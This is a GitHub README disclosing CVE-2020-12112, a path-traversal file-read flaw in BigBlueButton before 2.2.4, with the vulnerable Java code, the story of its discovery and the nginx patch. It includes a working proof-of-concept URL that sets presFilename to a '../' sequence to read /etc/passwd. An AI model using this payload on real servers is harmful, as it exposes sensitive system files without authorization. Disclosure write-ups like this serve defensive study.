Skip to content

tchenu/CVE-2020-12112

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

CVE-2020-12112 🚨

BigBlueButton versions lower than 2.2.4 have a LFI vulnerability allowing access to sensitive files.

Story πŸ“œ

During a distance learning course on a BigBlueButton instance a student in my class shared my teacher's slide presentation link and I noticed that the file name was included in the URL.

School's Slack

Student: "No need to write notes, I've got the slide."
Me: Well, I've got a security report to make. πŸ˜‚

By playing a little bit with it I was able to get access to the /etc/passwd file of the server and discover the existence of a security vulnerability on the open-source Big Blue Button solution.

I reported the vulnerability, the BBB team was quick to answer me and patch the vulnerability (only a few days).

Poc πŸ§™

public File getDownloadablePresentationFile(String meetingId, String presId, String presFilename) {
	log.info("Find downloadable presentation for meetingId={} presId={} filename={}", meetingId, presId, presFilename);

    File presDir = Util.getPresentationDir(presentationBaseDir, meetingId, presId);
    return new File(presDir.getAbsolutePath() + File.separatorChar + presFilename);
}

https://github.com/bigbluebutton/bigbluebutton/blob/v2.2.3/bbb-common-web/src/main/java/org/bigbluebutton/api/RecordingService.java#L90

As you can see this method used by a PresentationController allows you to download a presentation file by concatenating 3 parameters.

  • Absolute path of the file
  • A separator character
  • File name

This makes it possible to obtain links like this:

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500.pdf

To exploit the vulnerability, just get a valid link to a presentation file and modify the presFilename parameter to access sensitive files.

https://test.bigbluebutton.org/bigbluebutton/presentation/download/ffc98830dbfbac3dcc80cc4c5f30711ebd1c23e8-1586764259489/d2d9a672040fbde2a47a10bf6c37b6a4b5ae187f-1586764259500?presFilename=../../../../../etc/passwd

/etc/passwd file

Patch πŸ€•

The BBB team patched the vulnerability in the 2.2.4 version via a server configuration rule (HTTP), a regex and a precise filename format.

		location /bigbluebutton/presentation/download {
			return 404;
		}

		location ~ "^/bigbluebutton/presentation/download\/[0-9a-f]+-[0-9]+/[0-9a-f]+-[0-9]+$" {
			if ($arg_presFilename !~ "^[0-9a-f]+-[0-9]+\.[0-9a-zA-Z]+$") {
				return 404;
			}
			proxy_pass         http://127.0.0.1:8090$uri$is_args$args;
			proxy_set_header   X-Forwarded-For   $proxy_add_x_forwarded_for;
			# Workaround IE refusal to set cookies in iframe
			add_header P3P 'CP="No P3P policy available"';
		}

https://github.com/bigbluebutton/bigbluebutton/commit/5ebdf5ca7718fc8bb3c08867edd150278e6a724c#diff-c7d77969a4547b5349e55c5466948a27R45

References πŸ”

About

BigBlueButton versions lower than 2.2.4 have a LFI vulnerability allowing access to sensitive files. 🚨

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published